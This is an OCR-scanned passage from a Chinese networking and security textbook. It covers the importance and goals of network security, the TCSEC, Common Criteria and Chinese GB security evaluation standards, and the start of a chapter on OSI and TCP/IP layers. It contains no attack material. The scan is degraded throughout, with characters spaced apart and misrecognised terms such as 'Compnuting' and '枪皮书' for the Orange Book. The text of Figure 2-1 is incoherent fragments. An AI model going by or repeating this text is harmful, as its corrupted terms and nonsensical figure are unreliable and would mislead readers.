此 外 ,我 国 的 信息 化 核心 技术 特别 是 信息 安全 核心 技术 在 国际 上 尚 比较 落后 ,一些 关 键 
技术 受制 于 别人 ,也 是 造成 网 络 安 全 性 问题 的 重要 原因 之 一 。 


1.3 ”网络 安全 在 信息 化 中 的 重要 性 


随 着 网 络 应 用 的 越 来 越 广泛 .我国 互联 网 基础 建设 的 日 趋 完善 ,用 户 网 龄 的 逐渐 增长 、 
网 络 技术 的 创新 发 展 , 网 络 应 用 已 经 从 科研 .工作 .学习 .生活 娱乐 逐步 向 社会 经 济 各 领域 渗 
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透 ,网 民 对 网 络 信 任 和 安全 的 要 求 也 日 渐 提 高 。 网 络 安全 问题 已 日 益 受 到 人 们 的 重视 。 

总 体 来 看 ,网 络 安全 之 所 以 如 此 重要 ,表现 在 以 下 几 个 方面 。 

(1) 计算 机 存储 和 处 理 的 是 有 关 国 家 安全 的 政治 经 济 、 军 事 、 国 防 的 信息 及 一 些 部 门 、 
机 构 、 组 织 的 机 密 信息 或 是 个 人 的 敏感 信息 、 隐 私 ,因此 成 为 敌对 势力 、 不 法 分 子 的 攻击 
目标 。 

(2) 随 着 计算 机 系统 功能 的 日 益 完善 和 速度 的 不 断 提高 ,系统 组 成 越 来 越 复 杂 , 系 统 规 
模 越 来 越 大 ,特别 是 Internet 的 迅速 发 展 , 存 取 控 制 、 人 逻辑 连接 数量 不 断 增 加 ,软件 规模 空前 
膨胀 ,任何 隐 含 的 缺陷 、 失 误 都 能 造成 巨大 损失 。 

(3) 人 们 对 计算 机 系统 的 需求 在 不 断 扩 大 ,这 类 需求 在 许多 方面 都 是 不 可 逆转 ,不 可 和 替 
代 的 ,而 计算 机 系统 使 用 的 场所 正在 转向 工业 农业 、 野 外 天空. 海上 、 宇 宙 空 间 、 核 辐射 环 
境 等 ,这 些 环 境 都 比 机 房 恶劣 ,出 错 率 和 故障 的 增多 必 将 导致 可 靠 性 和 安全 性 的 降低 。 

(4) 随 着 计算 机 系统 的 广泛 应 用 ,各 类 应 用 人 员 队 伍 迅 速 发 展 壮 大 ,教育 和 培训 却 往往 
跟 不 上 知识 更 新 的 需要 ,操作 人 员 、 编 程 人 员 和 系统 分 析 人 员 的 失误 或 缺乏 经 验 都 会 造成 系 
统 的 安全 功能 不 足 。 

(5) 计算 机 网 络 安全 问题 涉及 许多 学 科 领 域 , 既 包括 自然 科学 ,又 包括 社会 科学 。 就 计 
算 机 系统 的 应 用 而 言 ,安全 技术 涉及 计算 机 技术 .通信 技术 、 存 取 控 制 技术 、 校 验 认 证 技术 、 
容错 技术 、 加 密 技 术 、 防 病毒 技术 、 抗 干扰 技术 、 防 泄漏 技术 等 ,因此 是 一 个 非常 复杂 的 综合 
问题 ,并 且 其 技术 ,方法 和 措施 都 要 随 着 系统 应 用 环境 的 变化 而 不 断 变化 。 

(6) 从 认识 论 的 高 度 看 .人 们 往往 首先 关注 系统 功能 ,然后 才 被 动 地 从 现象 注意 系统 应 
用 的 安全 问题 。 因 此 广泛 存在 着 重 应 用 、 轻 安全 、 法 律 意识 淡薄 的 现象 。 计 算 机 系统 的 安全 
是 相对 不 安全 而 言 的 ,许多 危险 .隐患 和 攻击 都 是 隐藏 的 .潜在 的 难以 明确 却 又 广泛 存 
在 的 。 


1.4 网 络 安全 的 目标 


网 络 信息 安全 主要 是 指 保护 网 络 信息 系统 ,使 其 稳定 可 靠 , 没 有 危险、 不 受 威胁 。 从 技 
术 角 度 来 说 ,网 络 信息 安全 与 保密 的 目标 主要 表现 在 系统 的 保密 性 、 完 整 性 、 真 实 性 、 可 靠 
性 可用性、 不 可 抵赖 性 等 方面 。 

归纳 起 来 ,网 络 安全 的 目标 主要 有 以 下 几 个 。 

(1) 身份 真实 性 。 通 过 各 种 身份 认证 技术 ,确保 通信 实体 的 身份 是 真实 的 。 

(2) 信息 保密 性 。 通 过 各 种 加 密 技术 ,保证 机 密 信息 不 会 泄漏 给 非 授权 的 人 或 实体 。 

(3) 信息 完整 性 。 确 保 发 送 的 信息 在 发 送 过 程 中 未 被 删 减 、 增 加 、 修 改 或 破坏 ,从 而 保 
证 接收 到 的 信息 和 发 出 的 信息 是 相同 的 。 

(4) 服务 可 用 性 。 保 证 合法 用 户 对 信息 或 资源 的 使 用 不 会 受到 影响 或 被 不 正当 地 
拒绝 。 

(5) 不 可 否认 性 。 保 证 发 送 方 不 能 否认 发 送 过 信息 ,接收 方 也 不 能 否认 接收 过 信息 , 任 
何 用 户 不 能 和 否认 对 信息 或 资源 的 访问 ,通过 建立 有 效 的 确认 机 制 ,防止 实体 否认 其 行为 。 

(6) 系统 可 控 性 。 能 够 监督 和 控制 使 用 资源 的 人 或 实体 对 资源 或 服务 的 使 用 方式 。 
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(7) 系统 易 用 性 。 在 满足 安全 性 的 前 提 下 ,系统 的 使 用 操作 应 当 简 单方 便 , 维 护 容易 。 

(8) 可 审查 性 。 对 出 现 的 网 络 安全 问题 提供 调查 的 依据 和 记录 。 

总 而 言 之 ,网 络 安全 的 目标 就 是 要 保证 合法 的 用 户 在 需要 访问 的 时 候 能 够 访问 到 具有 
访问 权限 的 资源 ; 非法 用 户 和 攻击 者 无 法 访问 和 窃取 受 保 护 的 信息 。 

要 实现 网 络 安全 的 上 述 目标 ,网 络 信息 系统 必须 具备 以 下 几 个 基本 功能 。 

(1) 网 络 安全 防御 。 对 要 求 有 安全 性 保障 的 网 络 ,必须 具备 各 种 网 络 安全 防御 手段 ,使 
得 网 络 系统 具备 阻止 .抵御 各 种 已 知 网 络 威胁 和 攻击 的 功能 。 

(2) 网 络 安全 检测 。 即 采用 各 种 手段 和 措施 ,检测 ,发现 各 种 已 知 或 未 知 的 网 络 威胁 ， 
并 能 够 采取 相应 的 防范 措施 。 

(3) 网 络 安全 应 急 。 一 旦 网 络 系统 受到 攻击 ,系统 无 法 正常 运行 ,甚至 数据 受到 破坏 ， 
必须 有 相应 的 应 急 手 段 和 策略 ,及 时 进行 响应 , 阻 断 网 络 攻击 ,记录 攻击 的 信息 ,以 便 事后 审 
计 和 处 理 。 

(4) 网 络 安全 恢复 , 即 在 网 络 因为 攻击 受到 破坏 后 ,能 够 尽快 恢复 网 络 系统 的 正常 运 
行 ,尽量 减少 网 络 系统 的 中 断 时 间 和 降低 数据 破坏 的 程度 。 


1.5 网 络 安全 的 评价 标准 


在 设计 一 个 网 络 信息 系统 或 者 对 完成 的 一 个 网 络 信 息 系统 进行 安全 性 评价 的 时 候 , 必 
须 依靠 相 应 的 标准 进行 。 目 前 ,主要 有 国际 评价 标准 和 我 国 制定 的 相关 标准 。 


1.5.1 国际 评价 标准 

1985 年 ,美国 国防 部 制定 了 计算 机 安全 标准 一 一 可 信任 计算 机 标准 评价 准则 (Trusted 
Computer System Evaluation Criteria,TCSEC) ,或 者 叫做 网 络 安全 枪 皮 书 , 对 计算 机 系统 
的 安全 性 进行 了 分 级 。 该 评价 准则 将 安全 的 级 别 从 高 到 低 分 成 4 个 类 别 : A 类、B 类 、C 类 
和 了 D 类 。 每 类 又 分 为 几 个 级 别 , 共 7 个 等 级 ,如 表 1-1 所 示 。 


表 1-1 可 信任 计算 机 标准 评价 准则 


类 别 级 别 名 称 主要 特征 

D D1 低级 保护 没有 安全 保护 

Cl 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控制 ,安全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗 透 能 力 
B3 安全 区 域 存 取 监控 ,高 抗 渗 透 能 力 

A Al 验证 设计 形式 化 的 最 高 级 描述 和 验证 


D 类 安全 等 级 : D 类 安全 等 级 只 包括 D1 一 个 级 别 。D1 的 安全 等 级 最 低 。D1 系统 只 
为 文件 和 用 户 提 供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 ,或 者 是 一 个 完全 没有 
保护 的 网 络 。DOS、Windows 95/98 都 属于 D1 级 的 产品 。 

C 类 安全 等 级 : 该 类 安全 等 级 能 够 提供 审慎 的 保护 ,并 为 用 户 的 行动 和 责任 提供 审计 
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能 力 。C 类 安全 等 级 可 划分 为 Cl 和 C2 两 类 。C1l 系统 的 可 信任 运算 基础 体制 (Trusted 
Compnuting Base,TCB) 通 过 将 用 户 和 数据 分 开 来 达到 安全 的 目的 。 在 Cl 系统 中 ,所 有 的 用 
户 以 同样 的 灵敏 度 来 处 理 数据 , 即 用 户 认 为 Cl 系统 中 的 所 有 文档 都 具有 相同 的 机 密 性 。 
C2 系统 比 C1 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ,C2 系统 的 用 户 分 别 对 各 自 
的 行为 负责 。C2 系统 通过 登录 过 程 ,安全 事件 和 资源 隔离 来 增强 这 种 控制 。C2 系统 具有 
Cl 系统 中 所 有 的 安全 性 特征 。 通 常 ,商用 的 操作 系统 都 属于 C2 安全 级 别 ,例如 : UNIX、 
Linux, Novell 3.X Windows NT、Windows 2000、Windows 2003 和 Windows 2008 都 是 C2 
级 的 产品 。 

B 类 安全 等 级 : B 类 安全 等 级 可 分 为 B1、B2 和 B3 三 类 。B 类 系统 具有 强制 性 保护 功 
能 。 强 制 性 保护 意味 着 如 果 用 户 没 有 与 安全 等 级 相连 ,系统 就 不 会 让 用 户 存 取 对 象 。B1l 系 
统 满足 下 列 要 求 : 系统 对 网 络 控制 下 的 每 个 对 象 都 进行 灵敏 度 标记 ; 系统 使 用 灵敏 度 标记 
作为 所 有 强迫 访问 控制 的 基础 ; 系统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标记 它们 ; 灵 
敏 度 标记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ; 当 系 统管 理 员 创建 系统 或 者 增加 新 
的 通信 通道 或 IO 设备 时 ,管理 员 必 须 指定 每 个 通信 通道 和 1/O 设备 是 单 级 还 是 多 级 ,并 
且 管 理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ; 所 有 直接 面向 用 
户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ?都 必须 产生 标记 来 指示 关于 输出 对 象 的 灵敏 度 ; 
系统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ; 系统 必须 通过 审计 来 记录 未 
授权 访问 的 企图 。 

B2 系统 必须 满足 B1 系统 的 所 有 要 求 。 另 外 .B2 系统 的 管理 员 必 须 使 用 一 个 明确 的 、 
文档 化 的 安全 策略 模式 作为 系统 的 可 信任 运算 基础 体制 。B2 系统 必须 满足 下 列 要 求 : 系 
统 必须 立即 通知 系统 中 的 每 一 个 用 户 所 有 与 之 相关 的 网 络 连接 的 改变 ; 只 有 用 户 能 够 在 可 
信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 运算 基础 体制 能 够 支持 独立 的 操作 者 和 管理 员 。 

B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监视 委托 管理 访问 能 
力 和 抗 干扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 求 : 除了 控制 对 个 
别 对 象 的 访问 外 ,B3 必须 产生 一 个 可 读 的 安全 列表 ; 每 个 被 命名 的 对 象 提供 对 该 对 象 没有 
访问 权 的 用 户 列表 说 明 ; B3 系统 在 进行 任何 操作 前 ,要 求 用 户 进 行 身 份 验证 ; B3 系统 验证 
每 个 用 户 , 同 时 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ; 设计 者 必须 正确 区 分 可 信任 的 通 
信和 路 径 和 其 他 路 径 ; 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 安全 审计 跟踪 ; 可 
信任 的 运算 基础 体制 支持 独立 的 安全 管理 。 一 些 军用 系统 的 安全 性 属于 B 级 。 

A 类 安全 等 级 : A 类 系统 的 安全 级 别 最 高 。 目 前 ,A 类 安全 等 级 只 包含 Al 一 个 安全 
类 别 。Al 类 与 B3 类 相似 ,对 系统 的 结构 和 策略 不 做 特别 要 求 。Al 系统 的 显著 特征 是 , 系 
统 的 设计 者 必须 按照 一 个 正式 的 设计 规范 来 分 析 系 统 。 对 系统 分 析 后 ,设计 者 必须 运用 核 
对 技术 来 确保 系统 符合 设计 规范 。A1l 系统 必须 满足 下 列 要 求 : 系统 管理 员 必须 从 开发 者 
那里 接收 到 一 个 安全 策略 的 正式 模型 ; 所 有 的 安装 操作 都 必须 由 系统 管理 员 进 行 ; 系统 管 
理 员 进 行 的 每 一 步 安装 操作 都 必须 有 正式 文档 。A 级 安全 性 最 高 ,但 只 有 不 接 电源 的 计算 
机 才能 达到 ,事实 上 它 只 是 一 个 概念 模型 。 

最 初 的 TCSEC 是 一 个 军用 的 标准 ,后 来 延 用 于 民用 领域 。 随 着 技术 的 不 断 发 展 ,新 的 
功能 被 不 断 开 发 出 来 ,对 安全 的 评价 标准 提出 了 新 的 要 求 。 欧 洲 四 国 (英法 、 德 .人 荷 ) 提 出 了 
评价 满足 保密 性 、 完 整 性 .可 用 性 要 求 的 信息 技术 安全 评价 准则 (ITSEC) 。1993 年 ,加拿大 
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发 布 了 “加 拿 大 可 信 计 算 机 产品 评价 准则 ”CTCTEC),CTCTEC 综合 了 TCSEC 和 ITSEC 
两 个 准则 的 优点 。 同 年 ,美国 在 对 TCSEC 进行 修改 补充 并 吸收 ITSEC 优点 的 基础 上 ,发 
布 了 “信息 技术 安全 评价 联邦 准则 ”(FC) 。 之 后 ,美国 联合 英 .法 、 德 . 荷 和 加 拿 大 ,会 同 国际 
标准 化 组 织 (ISO) 共 同 提出 了 信息 技术 安全 评价 通用 准则 (Common Criteria,CC)。CC 是 
目前 最 全 面 的 安全 评价 准则 。1996 年 6 月 ,CC 的 第 一 版 发 布 ; 1998 年 5 月 ,第 二 版 发 布 ; 
1999 年 10 月 ,CC V2. 1 版 发 布 ,该 标准 也 正式 成 为 国际 标准 ISO/IEC 15408 一 1999 ,目前 
最 新 的 版 本 是 CC 2. 3 标准 。 

CC 的 主要 思想 和 框架 都 取 自 ITSEC 和 FC, 并 充分 突出 了 “保护 轮廓 ”的 概念 。CC 将 
评估 过 程 划 分 为 功能 和 保证 两 部 分 ,评估 等 级 从 低 到 高 依次 为 EAL1、EAL2、EAL3、EAL4、 
EAL5、EAL6 和 EAL?7 共 7 个 等 级 ,EAL7 为 最 高 级 。 每 一 级 均 需 评估 7 个 功能 类 ,分 别 是 
配置 管理 .分 发 和 操作 、 开 发 过 程 、 指 导 文献 .生命 期 的 技术 支持 .测试 和 脆弱 性 评估 。CC 
发 布 的 目的 是 建立 一 个 各 国都 能 接受 的 通用 的 安全 评价 准则 ,国家 与 国家 之 间 可 以 通过 签 
订 互 认 协 议 来 决定 相互 接受 的 认可 级 别 , 这 样 能 使 基础 性 安全 产品 在 通过 CC 评价 并 得 到 
许可 进入 国际 市 场 时 ,不 需要 再 做 评价 。 

2008 年 ,我 国 参照 CC 2. 3 标准 和 其 他 的 相关 国际 标准 ,制定 出 了 我 国 最 新 的 安全 标 
准 : GB/T 18336 一 2008 ,并 已 采用 该 标准 对 相关 的 产品 和 技术 进行 评测 和 评估 。 

国际 安全 评测 标准 的 发 展 及 其 联系 如 图 1-2 所 示 。 
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1991 年 
美国 联邦 政府 
评价 准则 
FC 


图 1-2 国际 安全 评测 标准 的 发 展 及 其 联系 


1.5.2 我 国 的 评价 标准 


1999 年 10 月 ,国家 质量 技术 监督 局 批准 发 布 了 《计算 机 信息 系统 安全 保护 等 级 划分 准 
则 》CGB 17859 一 1999) ,将 计算 机 安全 保护 划分 为 以 下 5 个 从 低 到 高 的 级 别 。 

(1) 第 一 级 : 用 户 自主 保护 级 (GB1 安全 级 )。 它 的 安全 保护 机 制 使 用 户 具 备 自主 安全 
保护 的 能 力 ,保护 用 户 的 信息 免 受 非法 的 读 写 破坏 。 

(2) 第 二 级 : 系统 审计 保护 级 (GB2 安全 级 ) 。 除 具备 第 一 级 所 有 的 安全 保护 功能 外 ， 
要 求 创建 和 维护 访问 的 审计 跟踪 记录 .使 所 有 的 用 户 对 自己 的 行为 的 合法 性 负责 。 
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(3) 第 三 级 : 安全 标记 保护 级 (GB3 安全 级 ) 。 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 
求 以 访问 对 象 标 记 的 安全 级 别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

(4) 第 四 级 : 结构 化 保护 级 (GB4 安全 级 ) 。 除 继承 前 面 安 全 级 别 安全 功能 的 基础 上 ， 
将 安全 保护 机 制 划分 为 关键 部 分 和 非 关 键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 
存 取 , 从 而 加 强 系统 的 抗 渗透 能 力 。 

(5) 第 五 级 : 访问 验证 保护 级 (GB5 安全 级 ) 。 这 一 个 级 别 特别 增设 了 访问 验证 功能 ， 
负责 仲裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 该 安全 级 别 中 系统 具有 很 高 的 抗 渗透 能 力 。 

我 国 是 国际 标准 化 组 织 的 成 员 国 ,信息 安全 标准 工作 在 各 方面 的 努力 下 ,正在 积极 进行 
中 。 除 了 上 述 的 安全 标准 以 外 ,还 制订 了 一 些 相 关 的 信息 网 络 安 全 标准 ,主要 有 以 下 几 个 。 

(1) 信息 技术 : 网 络 安全 漏洞 扫描 产品 技术 要 求 ,标准 号 为 GA/T 404 一 2002 ,发 布 时 
间 为 2002 年 12 月 。 

(2) 民用 航空 空中 交通 管理 信息 系统 技术 规范 ,第 2 部 分 : 系统 与 网 络 安 全 ,标准 号 为 
MH/T 4018. 2 一 2004 ,发布 时 间 为 2004 年 12 月 。 

(3) IP 网 络 安全 技术 要 求 一 一 安全 框架 ,标准 号 为 YD/T 1163 一 2001 ,发 布 时 间 为 
2001 年 10 月 。 

(4) 承载 电信 级 业务 的 IP 专用 网 络 安 全 框架 ,标准 号 为 YD/T 1486 一 2006, 发 布 时 间 
为 2006 年 6 月 。 

(5) 公众 IP 网 络 安全 要 求 , 安 全 框架 ,标准 号 为 YD/T 1613 一 2007 ,发布 时 间 为 2007 
年 4 月 。 

(6) 公众 IP 网 络 安全 要 求 , 基 于 数字 证 书 的 访问 控制 ,标准 号 为 YD/T 1614 一 2007 ,发 
布 时 间 为 2007 年 4 月 。 

(7) 公众 IP 网 络 安全 要 求 ,基于 远 端 接 入 用户 验 证 服务 协议 (RADIUS) 的 访问 控制 ， 
标准 号 为 YD/T 1615 一 2007 ,发 布 时 间 为 2007 年 4 月 。 

(8) H. 323 网 络 安全 技术 要 求 ,标准 号 为 YD/T1701 一 2007 ,发布 时 间 为 2008 年 1 月 。 

但 是 ,应 该 承认 ,标准 的 制定 需要 较为 广泛 的 应 用 经 验 和 较为 深入 的 研究 背景 ,也 需要 
强大 的 技术 支撑 。 在 这 些 方面 ,我 国 还 存在 一 定 的 差距 ,这 方面 的 工作 还 需要 更 为 深入 的 
研究 。 
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本 章 学 习 要 求 : 

。 掌握 计算 机 网 络 的 定义 、 层 次 结构 及 各 层 的 功能 。 

。 熟悉 常见 的 网 络 拓扑 结构 类 型 及 其 特点 、 应 用 场合 。 

。 熟悉 TCP/IP 体系 结构 中 各 层 的 定义 、 功 能 .协议 及 其 报 文 结 构 。 
。 掌握 IP 地 址 分 类 、 使 用 方法 、 子 网 划分 方法 、 子 网 掩 码 计 算 方法 。 
。 掌握 常用 的 网 络 命 令 及 工具 的 使 用 方法 。 

。 熟悉 局 域 网 安全 存在 的 安全 威胁 及 其 安全 防范 方法 、 措 施 。 

。 掌握 网 络 故障 的 分 析 与 排除 技术 ,能 够 排除 常见 的 网 络 故障 。 


2.1 计算 机 网 络 及 其 层次 结构 


2.1.1 计算 机 网 络 的 定义 


计算 机 网 络 是 由 独立 的 计算 机 及 系统 互相 连接 ,可 以 交换 信息 的 集合 体 。 更 具体 地 说 ， 
计算 机 网 络 是 将 地 理 位 置 不 同 ,具有 独立 功能 的 多 个 计算 机 系统 通过 通信 设备 和 线路 连接 
起 来 ,以 功能 完善 的 网 络 软件 ( 即 网 络 的 通信 协议 .信息 交 换 方式 及 网 络 操作 系统 等 ) 实 现 网 
络 中 资源 共享 的 系统 ,其 核心 内 容 是 资源 共享 。 

计算 机 网 络 有 多 种 类 型 。 若 按照 网 络 传输 技术 进行 分 类 ,可 以 分 为 广播 式 网 络 
(Broadcast Networks) 和 点 对 点 网 络 (Point-to-Point Networks，P2P Net)。 按 照 网 络 的 覆 
盖 范 围 进行 分 类 ,可 以 分 为 局 域 网 (Local Area Network，LAN) 、 城 域 网 (Metropolitan 
Area Network,， MAN) 和 广域网 (Wide Area Network， WAN)。 按 照 拓扑 结构 进行 分 类 ， 
可 以 分 为 总 线 型 网 络 、 星 状 网 络 、 树 状 网 络 、 混 合 型 网 络 和 网 状 网 络 。 按 照 网 络 的 交换 方式 
可 以 分 为 电路 交换 式 网 络 . 报 文 交换 式 网 络 和 分 组 交换 式 网 络 。 按 照 网 络 传输 媒体 可 以 分 
为 双 绞 线 网 络 、 同 轴 电 缆 网 络 .光纤 网 络 和 无 线 网 络 等 。 


2.1.2 网 络 层 次 结构 及 其 各 层 的 功能 


1. 网 络 层次 结构 及 其 层次 模型 

计算 机 网 络 体系 结构 按照 结构 化 的 方式 进行 设计 ,分 层次 定义 了 网 络 通信 功能 ,制定 了 
各 层 的 通信 协议 标准 。 在 这 种 层次 结构 中 ,计算 机 网 络 的 每 一 层 都 建立 在 它 的 下 层 之 上 ( 除 
了 最 低层 ) 。 每 一 层次 在 逻辑 上 相互 独立 , 且 都 具有 特定 的 功能 。 不 同形 式 的 网 络 体系 结 
构 , 其 层次 的 数量 ,各 层 的 名 称 、 内 容 和 功能 都 不 相同 。 但 是 ,在 所 有 的 计算 机 网 络 体系 结 构 
中 ,相同 之 处 就 是 每 一 层 的 目的 都 是 向 上 一 层 提供 一 定 的 服务 。 

计算 机 网 络 有 多 种 分 层 方式 ,其 中 ,国际 标准 化 组 织 (ISO) 在 1977 年 为 计算 机 网 络 提 
出 了 一 种 独立 于 特定 机 型 .操作 系统 的 开放 式 系统 互 连 参考 模型 (OSI/RM) ,并 于 1983 年 
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形成 了 开放 式 系统 互 连 参 考 模型 的 正式 文件 , 即 ISO7498。OSI 参考 模型 是 连接 异种 计算 
机 的 标准 框架 ,为 连接 分 布 式 的 开放 系统 提供 了 基础 。 按 照 ISO 的 OSI 模型 ,网 络 分 为 7 
层 , 即 物理 层 ,数据 链 路 层 、 网 络 层 传输 层 ,会话 层 、 表 示 层 和 应 用 层 。 由 于 会 话 层 和 表示 层 
所 包含 的 协议 内 容 较 少 ,人 们 常常 称 它们 为 薄 层 ,因此 常 将 网 络 分 为 5 层 结构 , 即 物理 层 、 数 
据 链 路 层 、 网 络 层 、 传 输 层 (运输 层 ) 和 应 用 层 。 按 照 TCP/IP 分 层 , 计 算 机 网 络 被 分 为 4 层 ， 
即 网 络 接 口 层 、 网 络 层 传输 层 和 应 用 层 。 

图 2-1 为 三 种 分 层 结构 及 其 协议 数据 单元 名 称 。 


A TCP/IP ”协议 数 
OSs17 层 协议 每 层 的 主要 作用 。 5 层 协议 / 4 层 协议 据 音 元 
面向 应 用 站 应 用 层 1 应 用 程序 ， WWW FTP、 E-mail 、Telnet 局 
1 扩 衣 未 反 ] | 数据 或 信息 的 语法 表示 (如 ASCHI 友 )、 字符 和 单词 
面向 | 未 层 | | 数据 转换 、 加 窗 、 压 缩 应 用 层 | 字符 和 单词 
服务 上 上 会 话 层 |! 进程- 进程 层次 管理 、 双 工 、 半 双 工 、 
1 1 单 工 、 断 点 续 发 、 进 程 同 步 
1 和 
而 和 通信 | 做 博导 ] | 位 检 吉本 这 各 各 向 答 ” 融 到 开 四 公办 层 | 消息/ 报 文 
上 局 || 娄 提 分 和 路 由 过 择 、 关 二 者 利 、 。「 疝 吧 导 ] 人 组、 包 
98 层 ]! 并 训 人 网 络 民 ] 组、 
B11 1 和 
通信 | 链 路 层 实现 线 的 无 关 销 传输， 组 帆 、 纪 借 。| | 链 路 层 | ,入 
! 1 流量 控制 网 络 接口 层 | me 
物 至 层 | 人 比特 
传输 物理 信号 、 接 口 、 信 号 形式 、 速率 3 
ks 一 物理 媒体 : 双 绞 线 、 由 统 、 光 统 | 


作用 : 透明 地 传输 比特 流 
图 2-1 网 络 三 种 分 层 结构 及 其 协议 数据 单元 名 称 


2. 网 络 各 层次 的 作用 和 功能 

在 计算 机 网 络 中 ,每 层 可 能 执行 如 下 普遍 任务 中 的 一 个 或 多 个 。 

差错 控制 (Error Control) : 使 得 两 个 对 等 网 络 组 件 同 层 间 的 逻辑 通道 更 为 可 靠 。 

流量 控制 (Flow Control) : 避免 所 发 送 的 协议 数据 单元 淹没 在 处 理 较 慢 的 接收 方 。 

分 片 与 重组 (Segmentation and Reassembly): 在 发 送 方 将 大 数据 块 分 割 成 较 小 的 片 
段 ,在 接收 方 再 将 这 些 较 小 的 片段 重组 成 大 数据 块 。 

多 路 复 用 (Multiplexing) : 允许 多 个 较 高 层次 会 话 共 用 一 个 较 低层 次 的 连接 。 

连接 建立 (Connection Setup) : 提供 与 对 等 端的 连接 手段 。 

首先 来 了 解 一 下 OSI 参考 模型 中 各 层 的 功能 和 作用 。 

物理 层 建立 在 物理 媒体 之 上 ,是 OSI 参考 模型 的 最 低层 ,负责 在 物理 媒体 上 传输 数据 
位 。 所 有 的 通信 设备 .计算 机 等 均 需 要 用 物理 媒体 互 连 起 来 ,因此 物理 层 是 组 成 计算 机 网 络 
的 基础 。 物 理 层 的 功能 是 通过 物理 媒体 ,建立 .维护 和 拆除 实体 之 间 的 物理 连接 ,实现 实体 
之 间 的 位 传送 ,向 数据 链 路 层 提 供 一 个 透明 的 位 流传 送 服务 。 

数据 链 路 层 的 作用 是 通过 一 些 数据 链 路 层 的 协议 ,在 相 邻 结 点 的 物理 链 路 上 建立 数据 
链 路 ,实现 可 靠 的 数据 传输 ,从 而 保证 数据 通信 的 正确 性 。 数 据 链 路 层 的 主要 功能 包括 数据 
链 路 的 管理 、 帧 同步 .差错 检测 和 恢复 、 信 息 流量 控制 .数据 的 透明 传输 、 寻 址 等 。 

网 络 层 的 任务 是 将 数据 信息 从 源 端 传输 到 跨越 子 网 或 多 个 中 间 结 点 的 目的 端 。 从 源 端 
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到 目的 端 可 能 要 经 过 许多 中 间 的 中 继 结 点 ,也 可 能 要 经 过 多 个 通信 子 网 ,这 也 是 网 络 层 与 数 
据 链 路 层 和 物理 层 的 主要 区 别 。 网 络 层 是 处 理 端 到 端 数 据 传输 的 最 低层 ,具备 路 由 选择 、 拥 
塞 控制 等 功能 。 

传输 层 的 目标 是 为 用 户 在 网 络 上 提供 有 效 、 可 靠 和 价格 合理 的 数据 传输 服务 。 传 输 层 
是 整个 网 络 协议 层次 结构 中 最 关键 的 一 层 。 较 低层 的 协议 一 般 要 比 传输 层 简单 , 且 容 易 理 
解 。 对 于 两 个 需要 利用 网 络 进行 通信 的 主机 来 说 , 端 到 端的 可 靠 通 信 必 须要 通过 传输 层 协 
议 来 完成 。 

会 话 层 给 会 话 用 户 提供 一 种 称 为 会 话 的 连接 ,并 在 其 上 提供 以 普通 方式 传输 数据 的 方 
法 。 会 话 层 的 主要 功能 是 数据 的 交换 和 会 话 的 管理 。 

表示 层 的 主要 功能 是 保证 所 传输 的 数据 经 传输 后 不 改变 意义 。 这 是 因为 各 种 计算 机 都 
有 自己 的 数据 信息 表示 方法 ,不 同 的 计算 机 之 间 交 换 数据 信息 需要 经 过 一 定 的 转换 ,这 样 才 
能 保证 数据 在 不 同 的 计算 机 之 间 传 输 时 其 数据 的 含义 不 会 发 生变 化 。 

应 用 层 是 OSI 的 最 高 层 , 它 借助 于 应 用 实体 (AE) 应 用 协议 和 表示 服务 来 交换 信息 ， 
并 给 应 用 进程 访问 OSI 环境 提供 手段 。 应 用 层 的 作用 是 在 实现 多 个 进程 相互 通信 的 同时 ， 
完成 一 系列 业务 处 理 所 需 要 的 服务 功能 ,这 些 服务 功能 与 业务 功能 (如 远 地 文 件 操作 、 远 地 
报 文 分 发 等 ) 有 密切 的 关系 。 

随 着 计算 机 网 络 技术 的 发 展 ,数据 的 表示 和 会 话 的 交换 与 管理 逐渐 形成 统一 的 标准 和 
规范 ,会 话 层 和 表示 层 的 功能 和 协议 越 来 越 少 ,许多 人 将 这 两 层 称 为 “ 薄 层 ", 因 此 ,提出 了 一 
种 简化 的 5 层 计算 机 网 络 层 次 结构 模型 ,即将 表示 层 和 会 话 层 的 功能 、 协 议 均 合 并 到 应 用 层 
中 ,这 样 , 更 加 简化 了 协议 模型 ,便于 研究 和 学 习 。 

TCP/IP 模型 在 设计 时 考虑 到 与 具体 的 网 络 无 关 , 所 以 在 TCP/IP 的 标准 中 没有 对 最 
低 的 两 层 做 出 规定 ,形成 了 TCP/IP 的 4 层 层次 模型 。TCP/IP 模型 的 最 高 一 层 为 应 用 层 ， 
相当 于 OSI/RM 参考 模型 的 应 用 层 ,传输 层 与 OSI/RM 参考 模型 的 传输 层 对 应 ,网 络 层 与 
OSI/RM 参考 模型 的 网 络 层 对 应 ,网 络 接 口 层 与 OSIVRM 参考 模型 中 的 数据 链 路 层 和 物理 
层 对 应 。 在 TCP/IP 参考 模型 中 ,没有 与 OSI/RM 参考 模型 中 的 表示 层 和 会 话 层 对 应 的 层次 。 

TCP/IP 模型 中 网 络 层 的 主要 功能 是 负责 将 源 主机 的 报 文 分 组 发 送 到 目的 主机 , 源 主 
机 与 目的 主机 可 以 在 一 个 网 上 ,也 可 以 在 不 同 的 网 上 。 该 层 的 协议 名 称 为 IP 协议 (Internet 
